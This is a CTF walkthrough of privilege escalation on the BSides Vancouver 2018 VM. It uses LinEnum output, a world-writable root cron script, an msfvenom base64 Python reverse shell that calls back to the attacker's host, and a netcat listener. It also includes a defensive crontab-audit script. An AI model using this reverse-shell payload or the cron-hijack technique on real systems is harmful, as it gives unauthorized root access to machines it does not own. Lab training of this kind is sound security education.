
#HackOnTuesday Episode 10 How to hack the Bsides Vancouver 2018 CTF VM (Part 2)

Hello and welcome to another episode of the #HackOnTuesday show. Today, we will explore an alternative way to get root on the Bsides Vancouver 2018 CTF VM. If you haven't seen it already, I encourage you to go watch "How to hack the Bsides Vancouver 2018 CTF VM (Part 1)" before you watch this video.

In the previous video, we found a hidden WordPress installation and were able to take advantage of a weak password to log into the dashboard. From there, we then modified one of the many files of the theme and included a php/meterpreter/reverse_tcp payload.

So, here we are with a meterpreter shell and access to the target VM as the www-data user. What’s next? How do we get root? Well, we have to go through the system and look for either a security vulnerability or a misconfiguration that we can use to elevate our permissions.

A great tool to do that is LinEnum. For this demo, I’ve already cloned the repository in the root directory of my Kali machine as you can see if I type:

meterpreter > lls -S "LinEnum"
Listing Local: /root
====================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2019-09-24 06:05:19 -0700  LinEnum

NOTE: To get LinEnum, type: git clone https://github.com/rebootuser/LinEnum.git.

The next step is to upload the LinEnum script to the target VM.

meterpreter > pwd
/var/www/backup_wordpress/wp-content/themes/twentysixteen
meterpreter > cd /tmp
meterpreter > pwd
/tmp
meterpreter > upload /root/LinEnum/LinEnum.sh
[*] uploading  : /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] Uploaded -1.00 B of 44.59 KiB (-0.0%): /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] uploaded   : /root/LinEnum/LinEnum.sh -> LinEnum.sh

Excellent! We now have LinEnum on the target VM and just need to run it in order to get a good picture of the victim’s system. To run the script, we can type:

meterpreter > shell
Process 1975 created.
Channel 2 created.
bash ./LinEnum.sh > report.log         
exit

When the script is done, we should see a report.log file in the /tmp directory.

meterpreter > ls
Listing: /tmp
=============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
41777/rwxrwxrwx   4096   dir   2019-02-19 15:08:22 -0800  .ICE-unix
41777/rwxrwxrwx   4096   dir   2019-02-19 15:08:22 -0800  .X11-unix
100644/rw-r--r--  45656  fil   2019-02-19 17:26:29 -0800  LinEnum.sh
40700/rwx------   4096   dir   2019-02-19 15:08:22 -0800  pulse-PKdhtXMmr18n
100644/rw-r--r--  44774  fil   2019-02-19 17:28:19 -0800  report.log

So, let’s download this report.

meterpreter > download report.log
[*] Downloading: report.log -> report.log
[*] Downloaded 43.72 KiB of 43.72 KiB (100.0%): report.log -> report.log
[*] download   : report.log -> report.log

And take a look at its content.

root@kali:~# cat report.log 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Feb 19 17:28:00 PST 2019


### SYSTEM ##############################################
[-] Kernel information:
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

[...TRIMMED...]

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /usr/local/bin/cleanup
#

[...TRIMMED...]

If we go through the whole report, we will see many interesting things that are probably there just to make the VM more fun and that you will hopefully not encounter in a real-world environment, for example the fact that root is allowed to log in via SSH.

Nonetheless, there is one section that is particularly interesting, the crontab section. According to the output, there is a script that runs every minute: the /usr/local/bin/cleanup script. So, let’s take a look at the permissions of this file.

meterpreter > ls /usr/local/bin/cleanup
100777/rwxrwxrwx  64  fil  2018-03-03 16:13:53 -0800  /usr/local/bin/cleanup

Well, surprise, surprise... The /usr/local/bin/cleanup script is world writable and runs every minute as root. This means that we can add a command to this script and it will be executed as root.
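This is exactly the kind of finding you want to catch before an attacker does. The following audit script is an added example of mine, not code from the episode or from LinEnum: it parses system-crontab lines (the /etc/crontab format with a user field, as shown in the report above), pulls out every absolute path referenced by a root job, and flags any that is a world-writable file, a group-writable file owned by a non-root group, or a world-writable directory without the sticky bit. The crontab text is a constructed sample modelled on the report, and demo() recreates the misconfiguration with a mode 0777 file in a temporary directory so the check can be run anywhere.

```python
import os
import re
import stat
import tempfile

# Constructed sample modelled on the /etc/crontab section of the LinEnum report.
# {cleanup} is filled in by demo() with a temporary world-writable file.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*  *    * * *   root    {cleanup}
#
"""

# Absolute path tokens inside a shell command (a bare "/" as in "cd /" is skipped).
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")


def parse_system_crontab(text):
    """Return (schedule, user, command) for every job line of a system crontab.

    System crontabs (/etc/crontab, /etc/cron.d/*) carry a user field between the
    five time fields and the command; per-user crontabs lack it and are not handled.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:
            continue  # environment assignment or malformed line
        jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def writable_by_others(path):
    """Describe why `path` is risky as a root cron target, or None if it is not."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    mode = st.st_mode
    if stat.S_ISDIR(mode):
        # A world-writable directory without the sticky bit lets any user replace
        # the scripts that run-parts will execute from it.
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            return "world-writable directory without sticky bit"
        return None
    if mode & stat.S_IWOTH:
        return "world-writable file"
    if mode & stat.S_IWGRP and st.st_gid != 0:
        return "group-writable by non-root group"
    return None


def audit_crontab(text):
    """Return (user, schedule, path, reason) for each risky path used by a root job."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(command):
            reason = writable_by_others(path)
            if reason:
                findings.append((user, schedule, path, reason))
    return findings


def demo():
    """Recreate the page's misconfiguration in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        cleanup = os.path.join(tmp, "cleanup")
        with open(cleanup, "w") as f:
            f.write("#!/bin/sh\nrm -rf /var/log/apache2/*\n")
        os.chmod(cleanup, 0o777)  # the mistake: mode 100777, as listed above
        return audit_crontab(SAMPLE_CRONTAB.format(cleanup=cleanup))


if __name__ == "__main__":
    for user, schedule, path, reason in demo():
        print(f"{user} job [{schedule}] runs {path}: {reason}")
```

To audit a real host, feed it the contents of /etc/crontab and each file under /etc/cron.d; the fix for a finding like the cleanup script is simply `chmod 755` and root ownership, since nothing a root job executes should be writable by anyone else.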

For example, we can add a command to show the content of the /etc/shadow file or initiate a reverse shell to our machine. I prefer the second one, so let’s use msfvenom to create a Python reverse shell.

root@kali:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.10.6 lport=4444
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 521 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgIHN1YnByb2Nlc3MgICAsICAgICAgICBvczsgICAgICAgaG9zdD0iMTkyLjE2OC4xMC42IjsgICAgICAgcG9ydD00NDQ0OyAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgICAgICBwb3J0KSk7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgIDApOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgICAxKTsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAgMik7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Great! Now, we can add the Python command to our cleanup script.

meterpreter > download /usr/local/bin/cleanup
[*] Downloading: /usr/local/bin/cleanup -> cleanup
[*] Downloaded 64.00 B of 64.00 B (100.0%): /usr/local/bin/cleanup -> cleanup
[*] download   : /usr/local/bin/cleanup -> cleanup

---

root@kali:~# vim cleanup        # Add Python command
root@kali:~# cat cleanup 
#!/bin/sh

rm -rf /var/log/apache2/*	# Clean those damn logs!!

python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICAgICAgIHN1YnByb2Nlc3MgICAsICAgICAgICBvczsgICAgICAgaG9zdD0iMTkyLjE2OC4xMC42IjsgICAgICAgcG9ydD00NDQ0OyAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pOyAgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgICAgICBwb3J0KSk7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgICAgICAgIDApOyAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgICAxKTsgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgICAgICAgMik7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

Finally, before we upload our version of the cleanup script, we have to make sure we have a listener waiting for the reverse shell. So, let’s run Netcat in listening mode.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

With Netcat listening for incoming connections, we are ready to upload our version of the cleanup script.

meterpreter > upload cleanup /usr/local/bin/cleanup
[*] uploading  : cleanup -> /usr/local/bin/cleanup
[*] Uploaded -1.00 B of 586.00 B (-0.17%): cleanup -> /usr/local/bin/cleanup
[*] uploaded   : cleanup -> /usr/local/bin/cleanup

Then, we just need to wait and if everything goes well, we will get a reverse shell within a minute.

192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.6] from (UNKNOWN) [192.168.10.5] 57328
whoami
root
uname -a
Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

Boom! That’s it! This is how you elevate your permissions in the Bsides Vancouver 2018 CTF VM using a vulnerable cron job.

If you enjoyed this article and have an idea for another, please feel free to let me know via LinkedIn (https://www.linkedin.com/in/giannignesa/) or via Twitter (@ptracesecurity / @GianniGnesa).